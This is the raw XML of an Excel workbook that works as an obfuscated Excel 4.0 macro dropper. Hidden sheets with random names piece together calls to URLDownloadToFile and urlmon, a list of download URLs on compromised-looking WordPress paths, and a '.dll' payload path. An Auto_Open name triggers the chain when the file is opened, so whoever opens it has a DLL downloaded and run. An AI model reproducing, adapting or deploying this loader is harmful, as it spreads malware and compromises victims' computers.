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21m\CIR\CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C340ACAC-C1EF-411F-9D0F-00B35B6CE3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dvrv" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Rvbrs" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Mefshh" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="DDsx" sheetId="6" state="hidden" r:id="rId5"/>
    <sheet name="IJEGVS" sheetId="5" state="hidden" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="BTJJ1">IJEGVS!$H$16</definedName>
    <definedName name="BTJJ2">IJEGVS!$H$18</definedName>
    <definedName name="BTJJ3">IJEGVS!$H$20</definedName>
    <definedName name="BTJJ4">IJEGVS!$H$22</definedName>
    <definedName name="BTJJ5">IJEGVS!$H$24</definedName>
    <definedName name="BTJJ6">IJEGVS!$H$26</definedName>
    <definedName name="BTJJ7">IJEGVS!$H$28</definedName>
    <definedName name="_xlnm.Auto_Open">IJEGVS!$H$1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4" i="6" l="1"/>
  <c r="J8" i="6"/>
  <c r="I3" i="3"/>
  <c r="S3" i="4"/>
  <c r="D12" i="4"/>
  <c r="Q11" i="3"/>
  <c r="K14" i="3"/>
  <c r="P5" i="3"/>
  <c r="G20" i="4"/>
  <c r="D8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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20" uniqueCount="20">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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iqraacfindia.org/wp-admin/dG/","</t>
  </si>
  <si>
    <t>he.adar-and-ido.com/wp-admin/xk7D/","</t>
  </si>
  <si>
    <t>w"&amp;"ww.digigoal.fr/wp-admin/VfU0aIj/","</t>
  </si>
  <si>
    <t>carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","</t>
  </si>
  <si>
    <t>al-brik.com/vb/mMQlbHPCX/","</t>
  </si>
  <si>
    <t>apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","</t>
  </si>
  <si>
    <t>biantarajaya.com/awstats-icon/VR5wDEvBj/","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</si>
</sst>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385006</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>266700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18037C5-C6E5-40DF-80CF-5143EDD43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38606" cy="266700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76EFCE3-1996-4303-A710-59F8AEC8A0BC}">
  <dimension ref="H13"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="B8" sqref="B8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="8" max="8" width="255.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="13" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H13" t="b">
        <f>FORMULA(Ydvrv!P22&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!F19&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18,H16)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ1"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!F21&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H18)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ2"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!F23&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H20)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ3"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!H19&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H22)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ4"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!H21&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H24)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ5"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!H23&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H26)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ6"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!L2&amp;Ydvrv!B15&amp;Ydvrv!B15&amp;Rvbrs!D8&amp;Rvbrs!I3&amp;Mefshh!G20&amp;Rvbrs!P5&amp;Ydvrv!H4&amp;Ydvrv!L2&amp;Rvbrs!K14&amp;Mefshh!J19&amp;DDsx!G14&amp;Rvbrs!J19&amp;Mefshh!S3&amp;DDsx!J8&amp;Mefshh!F18&amp;Ydvrv!P13,H28)=FORMULA(Ydvrv!P22&amp;Ydvrv!J11&amp;Ydvrv!B18&amp;Ydvrv!P11&amp;"BTJJ7"&amp;Mefshh!Q7&amp;Ydvrv!H9&amp;Ydvrv!B15&amp;Ydvrv!I17&amp;Ydvrv!I3&amp;Ydvrv!H13&amp;Ydvrv!P11&amp;Ydvrv!K9&amp;Ydvrv!P13&amp;Ydvrv!P7&amp;Ydvrv!P13,H30)=FORMULA(Ydvrv!P22&amp;Ydvrv!H13&amp;Ydvrv!N4&amp;Ydvrv!H13&amp;Ydvrv!H9&amp;Ydvrv!P11&amp;Ydvrv!P15&amp;Ydvrv!H9&amp;Ydvrv!P20&amp;Mefshh!M14&amp;Mefshh!N10&amp;Mefshh!I6&amp;Ydvrv!P19&amp;Rvbrs!Q11&amp;Mefshh!D12&amp;DDsx!J8&amp;Ydvrv!P15&amp;Ydvrv!P13,H32)=FORMULA(Ydvrv!P22&amp;Ydvrv!G24&amp;Ydvrv!H13&amp;Ydvrv!E6&amp;Ydvrv!E11&amp;Ydvrv!F4&amp;Ydvrv!K23&amp;Ydvrv!P11&amp;Ydvrv!P13,H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N34" sqref="AN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AC52-5089-4478-A4D1-0761EC48CF98}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B9" sqref="B9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03FB0-8B00-40E6-AB34-FAC3510DD698}">
  <dimension ref="D3:Q23"/>
  <sheetViews>
    <sheetView topLeftCell="A10" workbookViewId="0">
      <selection activeCell="D15" sqref="D15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="4:17" x14ac:dyDescent="0.25">
      <c r="I3" t="str">
        <f>T(Ydvrv!D7&amp;Ydvrv!P15&amp;Ydvrv!P7&amp;Ydvrv!P15&amp;Ydvrv!E11&amp;Ydvrv!F4&amp;Ydvrv!B15&amp;Ydvrv!D13&amp;Ydvrv!E2)</f>
        <v>n","URLDo</v>
      </c>
    </row>
    <row r="5" spans="4:17" x14ac:dyDescent="0.25">
      <c r="P5" t="str">
        <f>T(Ydvrv!E2&amp;Ydvrv!D17&amp;Ydvrv!F15&amp;Ydvrv!E6&amp;Ydvrv!E2&amp;Ydvrv!B18&amp;Ydvrv!G2&amp;Ydvrv!C9)</f>
        <v>oadToFil</v>
      </c>
    </row>
    <row r="8" spans="4:17" x14ac:dyDescent="0.25">
      <c r="D8" t="str">
        <f>T(Ydvrv!P11&amp;Ydvrv!P15&amp;Ydvrv!B5&amp;Ydvrv!C3&amp;Ydvrv!C9&amp;Ydvrv!A12&amp;Ydvrv!E2)</f>
        <v>("urlmo</v>
      </c>
    </row>
    <row r="11" spans="4:17" x14ac:dyDescent="0.25">
      <c r="Q11" t="str">
        <f>T(Ydvrv!P2&amp;Ydvrv!M7)</f>
        <v>-s</v>
      </c>
    </row>
    <row r="14" spans="4:17" x14ac:dyDescent="0.25">
      <c r="K14" t="str">
        <f>T(Ydvrv!P15&amp;Ydvrv!P7&amp;Ydvrv!P15&amp;Ydvrv!J6&amp;Ydvrv!J6&amp;Ydvrv!H9&amp;Ydvrv!H9&amp;Ydvrv!K14&amp;Ydvrv!K14&amp;Ydvrv!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="19" spans="6:10" x14ac:dyDescent="0.25">
      <c r="F19" t="s">
        <v>13</v>
      </c>
      <c r="H19" t="s">
        <v>16</v>
      </c>
      <c r="J19" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="21" spans="6:10" x14ac:dyDescent="0.25">
      <c r="F21" t="s">
        <v>14</v>
      </c>
      <c r="H21" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="23" spans="6:10" x14ac:dyDescent="0.25">
      <c r="F23" t="s">
        <v>15</v>
      </c>
      <c r="H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D2F6-5F28-4F97-80B4-D8C5DD20BD74}">
  <dimension ref="D3:S20"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F22" sqref="F22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="4:19" x14ac:dyDescent="0.25">
      <c r="S3" t="str">
        <f>T(Ydvrv!P5&amp;Ydvrv!P5&amp;Ydvrv!P3&amp;Ydvrv!F10&amp;Ydvrv!F19&amp;Ydvrv!G14&amp;Ydvrv!L11)</f>
        <v>..\whxc</v>
      </c>
    </row>
    <row r="6" spans="4:19" x14ac:dyDescent="0.25">
      <c r="I6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="4:19" x14ac:dyDescent="0.25">
      <c r="Q7" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="4:19" x14ac:dyDescent="0.25">
      <c r="N10" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="12" spans="4:19" x14ac:dyDescent="0.25">
      <c r="D12" t="str">
        <f>T(Ydvrv!P19&amp;Ydvrv!P5&amp;Ydvrv!P5&amp;Ydvrv!P3&amp;Ydvrv!F10&amp;Ydvrv!F19&amp;Ydvrv!G14&amp;Ydvrv!L11)</f>
        <v xml:space="preserve"> ..\whxc</v>
      </c>
    </row>
    <row r="14" spans="4:19" x14ac:dyDescent="0.25">
      <c r="M14" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="18" spans="6:10" x14ac:dyDescent="0.25">
      <c r="F18" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="19" spans="6:10" x14ac:dyDescent="0.25">
      <c r="J19" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="20" spans="6:10" x14ac:dyDescent="0.25">
      <c r="G20" t="str">
        <f>CONCATENATE(Ydvrv!F10,Ydvrv!D7,Ydvrv!C9)</f>
        <v>wnl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32B4C-782E-408D-B5C9-09C864138A57}">
  <dimension ref="G8:J14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G15" sqref="G15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="8" spans="7:10" x14ac:dyDescent="0.25">
      <c r="J8" t="str">
        <f>T(Ydvrv!P5&amp;Ydvrv!F15&amp;Ydvrv!C9&amp;Ydvrv!C9)</f>
        <v>.dll</v>
      </c>
    </row>
    <row r="14" spans="7:10" x14ac:dyDescent="0.25">
      <c r="G14" t="str">
        <f>CONCATENATE(Ydvrv!P15&amp;Ydvrv!F19&amp;Ydvrv!L19&amp;Ydvrv!L19&amp;Ydvrv!N17&amp;Ydvrv!M7&amp;Ydvrv!P20&amp;Ydvrv!P27&amp;Ydvrv!P27)</f>
        <v>"https://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Sheet</vt:lpstr>
      <vt:lpstr>Ydvrv</vt:lpstr>
      <vt:lpstr>Rvbrs</vt:lpstr>
      <vt:lpstr>Mefshh</vt:lpstr>
      <vt:lpstr>DDsx</vt:lpstr>
      <vt:lpstr>IJEGVS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HRdtjnd</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-22T05:53:56Z</dcterms:modified>
</cp:coreProperties>
</file>